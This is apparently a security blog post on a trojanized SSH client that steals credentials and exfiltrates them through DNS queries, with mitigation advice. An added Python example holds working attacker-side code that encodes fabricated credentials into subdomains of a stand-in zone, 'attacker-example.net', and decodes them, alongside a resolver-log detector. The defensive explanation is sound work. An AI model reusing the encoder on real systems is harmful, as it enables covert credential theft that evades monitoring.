The bad guys have two problems (well, at least two). The first one is how to get into your system. If the news is any indication, that doesn’t seem to be that hard. The second is getting the data that they want out, undetected.
For organizations that have a Security Information and Event Management (SIEM) solution or a Data Loss Prevention (DLP) system, it is getting harder to sneak the data out. But fear not, hackers are creative.
As of last month, attackers have been getting in and dropping a trojanized Secure Shell (SSH) client on the compromised system (by itself a fairly ordinary technique). When the admin uses that client to log into a remote system, it captures the user's credentials.
Here is the new part. Those credentials leave the hacked system inside the payload of a DNS query: the captured data is encoded into the subdomain labels of a name under a domain the attacker controls, and the query is forwarded by the local resolver to the attacker's authoritative name server, which simply records and decodes it. DNS is flexible about what goes in a name (up to 63 characters per label and roughly 253 per full name), so the payload is variable, and if all you are exporting is a set of user credentials, that fits in a handful of queries.
Until today this particular strain was not detected by the AV vendors. Today a small group of products detects it, but there are a million variations on the scheme; now that the idea is known, you could see a new variant every day.
Multifactor authentication for ALL logins to EVERY system, web sites included, makes this attack less useful, because a captured password is no longer enough on its own. But as long as some systems still accept a password alone, those credentials can still be stolen and used.
You could also block all outbound DNS except from an internal DNS resolver, but that alone will not stop the attack: the resolver still forwards the query to the attacker's authoritative name server, which is exactly where the data is read. What it buys you is a single choke point where every query can be logged and inspected for over-long, high-entropy subdomains and bursts of unique names under one domain. It also does nothing for the company laptop at home or in a coffee shop, where the machine uses whatever resolver the local network hands it.
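The two halves of the picture, as an added example that is not part of the original post and is not Alert Logic's or any real tool's code: the encoding step described above (credentials packed into subdomain labels and reassembled by the attacker's name server) and the kind of check a defender can run over the resolver logs that the choke point above makes possible. Everything in it is constructed: attacker-example.net stands in for a zone the attacker is assumed to control, the "captured" credentials are fabricated, and the log format and thresholds are this example's own.

```python
import base64
import math
from collections import defaultdict

# RFC 1035 limits: they bound how much fits in a single query name.
MAX_LABEL = 63    # bytes per label
MAX_NAME = 253    # bytes per full name in text form

# Constructed sample data (not from any real incident): a zone the attacker
# is assumed to control, and a small credential dump such as a trojanized
# SSH client might capture.
PARENT = "attacker-example.net"
SECRET = b"\n".join([
    b"host=db01.corp.example user=root pass=Correct-Horse-Battery-Staple",
    b"host=bastion.corp.example user=ops pass=Tr0ub4dor&3",
    b"host=10.20.30.40 user=backup pass=hunter2",
    b"host=git.corp.example user=deploy pass=s3cr3t-deploy-key-2024",
])


def build_exfil_queries(secret: bytes, parent: str, labels_per_query: int = 1) -> list[str]:
    """Attacker side: pack `secret` into subdomain labels under `parent`.
    Base32 survives DNS case folding, and each query name carries a
    sequence label so the receiver can put the chunks back in order."""
    enc = base64.b32encode(secret).decode("ascii").rstrip("=").lower()
    labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
    queries = []
    for seq, i in enumerate(range(0, len(labels), labels_per_query)):
        name = ".".join([f"s{seq}", *labels[i:i + labels_per_query], parent])
        if len(name) > MAX_NAME:
            raise ValueError("name too long; reduce labels_per_query")
        queries.append(name)
    return queries


def reassemble(queries: list[str], parent: str) -> bytes:
    """What the attacker's authoritative server does with the names it sees:
    order by sequence label, drop it and the parent zone, base32-decode."""
    suffix = "." + parent
    chunks = []
    for q in queries:
        labels = q[:-len(suffix)].split(".")
        chunks.append((int(labels[0][1:]), "".join(labels[1:])))
    enc = "".join(c for _, c in sorted(chunks)).upper()
    enc += "=" * (-len(enc) % 8)          # restore the padding stripped above
    return base64.b32decode(enc)


def shannon_entropy(s: str) -> float:
    """Bits per character; base32 payload scores far higher than hostnames."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Crude: last two labels. A production detector should use the Public
    Suffix List so that e.g. co.uk is not treated as a registered domain."""
    return ".".join(qname.split(".")[-2:])


def flag_dns_exfil(log_lines, max_label=30, min_entropy=3.2, max_unique=3) -> dict:
    """Defender side, run over resolver log lines of the form
    '<time> <client> <qname>'. Three cheap signals: over-long labels,
    high-entropy subdomains, and one client asking for many distinct names
    under the same parent. Returns {parent_domain: [reasons]}."""
    per_client = defaultdict(set)
    findings = defaultdict(set)
    for line in log_lines:
        _, client, qname = line.split()
        qname = qname.rstrip(".")
        parent = registered_domain(qname)
        sub = qname[:-(len(parent) + 1)] if qname != parent else ""
        labels = [l for l in sub.split(".") if l]
        if any(len(l) > max_label for l in labels):
            findings[parent].add("long-label")
        if labels and shannon_entropy("".join(labels)) > min_entropy:
            findings[parent].add("high-entropy")
        per_client[(client, parent)].add(qname)
    for (_, parent), names in per_client.items():
        if len(names) > max_unique:
            findings[parent].add("many-unique-subdomains")
    return {p: sorted(r) for p, r in findings.items()}


def constructed_log() -> list[str]:
    """Constructed resolver log (not real data): benign lookups plus the
    queries the trojanized client would emit for SECRET."""
    benign = [
        "10.0.0.5 www.vendor-example.com",
        "10.0.0.5 updates.vendor-example.com",
        "10.0.0.7 www.vendor-example.com",
    ]
    exfil = [f"10.0.0.5 {q}" for q in build_exfil_queries(SECRET, PARENT)]
    return [f"2024-05-01T10:00:{i:02d} {e}" for i, e in enumerate(benign + exfil)]


if __name__ == "__main__":
    queries = build_exfil_queries(SECRET, PARENT)
    print(f"{len(queries)} queries carry {len(SECRET)} bytes; first: {queries[0]}")
    assert reassemble(queries, PARENT) == SECRET
    for parent, reasons in flag_dns_exfil(constructed_log()).items():
        print(parent, reasons)
```

The thresholds are illustrative and would need tuning against your own resolver's baseline (CDNs and some telemetry legitimately use long, random-looking labels), and none of these signals help once the infected host bypasses your resolver with DNS over HTTPS or queries the attacker's server directly from an untrusted network.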
This attack is not suited to stealing large quantities of data, since each query carries at most a couple of hundred bytes and the volume of queries quickly stands out, but for small amounts such as login credentials, credit card numbers, Social Security numbers and bank account details it is definitely workable. Source: Alert Logic.